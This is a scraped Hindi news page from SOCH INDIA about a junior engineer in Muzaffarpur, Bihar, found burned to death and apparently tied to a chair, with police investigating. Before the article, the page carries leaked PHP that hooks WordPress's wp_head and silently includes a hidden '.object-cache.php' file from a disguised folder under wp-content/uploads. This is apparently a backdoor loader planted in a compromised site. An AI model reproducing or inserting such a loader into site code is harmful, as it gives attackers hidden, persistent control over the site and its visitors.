add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बिहार: महिला इंजीनियर की जिंदा जलाकर हत्या, कुर्सी से बंधा शव बरामद – SOCH INDIA
Menu

अपराध समाचार
बिहार: महिला इंजीनियर की जिंदा जलाकर हत्या, कुर्सी से बंधा शव बरामद

nobanner

बिहार के मुजफ्फरपुर के अहियापुर थाना क्षेत्र के बजरंग बिहार कोलनी में एक महिला का जला हुआ शव बरामद किया गया है. शव की पहचान मुरौल प्रखंड के मनरेगा में कार्यरत जुनियर इंजीनियर सरिता के रूप में हुई है.

महिला को कुर्सी से बांधकर जिंदा जलाने की आशंका है. महिला की मां और भाई ने चप्पल से महिला की पहचान की है. सीतामढी के कन्हौली थाना अन्तर्गत फुलकाहां की रहनेवाली सरिता मुजफ्फरपुर के मुरौल प्रखंड में मनरेगा विभाग में जुनियर इंजिनियर के पद पर कार्यरत थी.

मकान से सरिता का जला हुआ शव बरामद हुआ है. वह मकान सरिता ने ऑफिस के लिए किराया पर ले रखा था. मकान की एक चाबी मकान मालिक के पास और दूसरी चाबी सरिता के पास थी.

मामले का खुलासा तब हुआ जब मकान मालिक अपने घर पर पहुंचे और मकान खुला देखकर कमरे में आवाज लगाई. कोई जबाव नहीं मिलने पर मकान मालिक विजय गुप्ता ने दरवाजा खोला तो अंदर सरिता की जली लाश पड़ी थी.

पूरे मामले को अहियापुर थाने में दर्ज कर एफएसएल की टीम जांच में जुट गई है. सरिता की मां ने किसी का नाम एफआईआर में नहीं दिया है. पुलिस यह जांच करने में जुटी है कि महिला को यहीं मारा गया या कहीं और हत्या कर कमरें मे जला दिया गया.